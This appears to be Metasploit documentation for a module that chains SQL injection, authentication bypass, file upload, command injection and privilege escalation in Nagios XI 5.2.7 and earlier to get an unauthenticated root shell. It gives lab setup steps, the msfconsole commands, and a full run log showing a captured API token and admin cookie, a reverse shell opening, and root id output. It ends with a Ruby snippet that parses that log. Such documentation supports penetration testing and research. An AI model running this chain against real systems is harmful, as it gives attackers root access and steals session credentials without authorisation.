metasploit-gs/documentation/modules/exploit/linux/http/nagios_xi_chained_rce.md
2016-07-01 01:17:27 -05:00

## Intro

Nagios XI is the enterprise edition of Nagios, the monitoring software we love and hate.

This module chains an SQL injection, an authentication bypass, an arbitrary file upload, a command injection, and a privilege escalation in Nagios XI <= 5.2.7 to pop a root shell. The whole chain is unauthenticated: no credentials are needed.

## Setup

Download the virtual appliance:

I used the 64-bit OVA here. Remove the "-64" in the link to download the 32-bit OVA.

Import the OVA:

Just import it into VMware or VirtualBox. It should create a VM for you.

Configure the software:

When you start the VM, the console login screen shows "Access Nagios XI at http://[redacted]". Open that URL in your browser and follow the on-screen steps to configure the app.

Completing that configuration is not actually required for the exploit to work, but do it anyway so the appliance is in the state a real deployment would be in.

## Usage

Set `RHOST` and fire off the module; nothing else is required. `set VERBOSE true` if you want to see each stage of the chain (version detection, API token, admin cookie, CSRF token, monitored host, component upload, shell, cleanup).

```
msf > use exploit/linux/http/nagios_xi_chained_rce
msf exploit(nagios_xi_chained_rce) > set rhost [redacted]
rhost => [redacted]
msf exploit(nagios_xi_chained_rce) > set verbose true
verbose => true
msf exploit(nagios_xi_chained_rce) > run

[*] Started reverse TCP handler on [redacted]:4444
[*] Nagios XI version: 5.2.7
[*] Getting API token
[+] API token: 3o2erpm0
[*] Getting admin cookie
[+] Admin cookie: nagiosxi=jcilcfptj7ogpvovgs3i5gilh7;
[+] CSRF token: 477abd7db8d06ade9c7fcd9e405fd911
[*] Getting monitored host
[+] Monitored host: localhost
[*] Downloading component
[*] Uploading root shell
[*] Popping shell!
[*] Command shell session 1 opened ([redacted]:4444 -> [redacted]:60132) at 2016-07-01 00:12:20 -0500
[*] Cleaning up...
[*] rm -rf ../profile
[*] unzip -qd .. ../../../../tmp/component-profile.zip
[*] chown -R nagios:nagios ../profile
[*] rm -f ../../../../tmp/component-xAmhUGRn.zip

3904334783
TwMSxKhKEaxUjlTSNYyeICVUuPSNkwoI
cKKdfdZxRpDduZCezKXOficrVyNeVggH
mRVdstQmfdtnFiYMjLgyfvRWXyQZPyUF
dDlRoqhBvqvwrhKYWumimyKxVHSbrkoE
wjCWBTgbsQuPemhiByeMpMEhdPooHEvw
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
uname -a
Linux localhost.localdomain 2.6.32-573.22.1.el6.x86_64 #1 SMP Wed Mar 23 03:35:39 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
```
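The first thing the module prints is the detected Nagios XI version, and whether the target is in the affected range (<= 5.2.7) decides whether the rest of the chain is worth running. The snippet below is an added example, not code from the module or from Metasploit: it parses the verbose output shown above (sample lines copied from that run) and compares the version with `Gem::Version` rather than as a string, because a naive string comparison would wrongly rank `5.2.10` below `5.2.7`. The function names `affected?` and `parse_run` and the constant `AFFECTED_MAX` are this example's own.

```ruby
# Added example (not part of the Metasploit module or its documentation).
# Parses the module's verbose output and checks the version range.
require 'rubygems' # provides Gem::Version

# Highest version the module targets, per the doc above.
AFFECTED_MAX = Gem::Version.new('5.2.7')

# Sample lines copied from the verbose run shown in this document.
SAMPLE_LOG = <<~LOG
  [*] Nagios XI version: 5.2.7
  [*] Getting API token
  [+] API token: 3o2erpm0
  [*] Getting admin cookie
  [+] Admin cookie: nagiosxi=jcilcfptj7ogpvovgs3i5gilh7;
  [+] CSRF token: 477abd7db8d06ade9c7fcd9e405fd911
  [*] Getting monitored host
  [+] Monitored host: localhost
LOG

# true/false for a well-formed version, nil if the string is not a version.
# Gem::Version compares numerically per component, so '5.2.10' > '5.2.7'.
def affected?(version)
  Gem::Version.new(version) <= AFFECTED_MAX
rescue ArgumentError
  nil
end

# Pull the artifacts the module reports out of its output lines.
def parse_run(log)
  info = {}
  log.each_line do |line|
    case line
    when /^\[\*\] Nagios XI version: (\S+)/ then info[:version] = $1
    when /^\[\+\] API token: (\S+)/ then info[:api_token] = $1
    when /^\[\+\] Admin cookie: (\S+)/ then info[:cookie] = $1
    when /^\[\+\] CSRF token: (\h+)/ then info[:csrf] = $1
    when /^\[\+\] Monitored host: (\S+)/ then info[:host] = $1
    end
  end
  info[:affected] = affected?(info[:version]) if info[:version]
  info
end

if $PROGRAM_NAME == __FILE__
  p parse_run(SAMPLE_LOG)
end
```

Run it with `ruby nagios_check.rb` (any filename works); the hash it prints shows the version, the API token, the admin cookie, the CSRF token and the monitored host, plus `affected: true` for the 5.2.7 target from the run above.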